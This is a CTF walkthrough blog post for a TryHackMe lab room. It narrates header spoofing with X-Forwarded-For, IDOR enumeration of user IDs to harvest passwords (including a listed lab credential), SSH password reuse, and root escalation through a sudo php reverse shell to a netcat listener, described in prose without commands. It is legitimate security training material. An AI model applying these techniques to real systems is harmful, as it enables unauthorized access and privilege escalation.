CTF Walkthrough | TryHackMe | Me & My Girlfriend
Have you ever wondered how an IDOR vulnerability can lead to the root access on a remote machine through ssh. You can always LogIn on TryHackMe, go to rooms → meandmygirlfriend
Reconnaissance:
Initially using the nmap to scan the port of information gathering. I got port 80 and 22 open.
When I went ahead to port 80, I found this message which was quite different.
Adding Headers:
After doing view page source, I was able to see this message that suggested that for a header x-forwarded-for
I learnt this new concept of applying headers to open or redirect to the hidden website. This understanding took me a while since I was not able to open the website that was hidden under this header.
I captured the request using burp suite and then I sent the request to the repeater with the header added in the request.
First, I edited a single request and I tried to understand the response coming from that single request. I was able to get a redirect to the website using the header.
After doing it for one time, it prompted a new request without the header. So I either had to keep on adding the same header for each request which was a tedious job or find an automated way of adding it for every request.
I went to Proxy settings and added the request header in the match and replace rules. This automated the response for each request and added the header x-forwarded-for: localhost
Once I added this request header, I was able to access the website.
Gaining Access (IDOR):
I registered as a new user and tried to login later using the same credentials.
You can see in the url, that after the query string there is a chance for IDOR vulnerability which is based on authorization.
I kept on changing the user id paramter and found multiple users in the website. Here is found one user with user id 9.
I was able to recover the password as well.
For user id 5 I found user Alice with the passowrd 4lic3.
I got IDOR vulnerability and found 6 users with different userid. Most interesting one is Alice.
I remembered the port 22, it was open. I saw this as an opportunity to login into the network machine using the same password I found in the website.
I used the command to login through ssh.
I enumerated the alice profile and found the first flag in the my_secret directory.
Privilege Escalation:
After finding the first flag, I went on to find root user flag through sudo -l command.
There I found that the reverse shell existed for /usr/bin/php on GTFO bins.
I edited the reverse shell command to add my kali machine’s ip address with a valid port 1234 for net cat listner.
I ran the command for the Alice account through ssh and found the flag
I saw a reverse shell on the netcat listner and found the flag in /root directory.
See you guys in the next one. Peace ✌🏽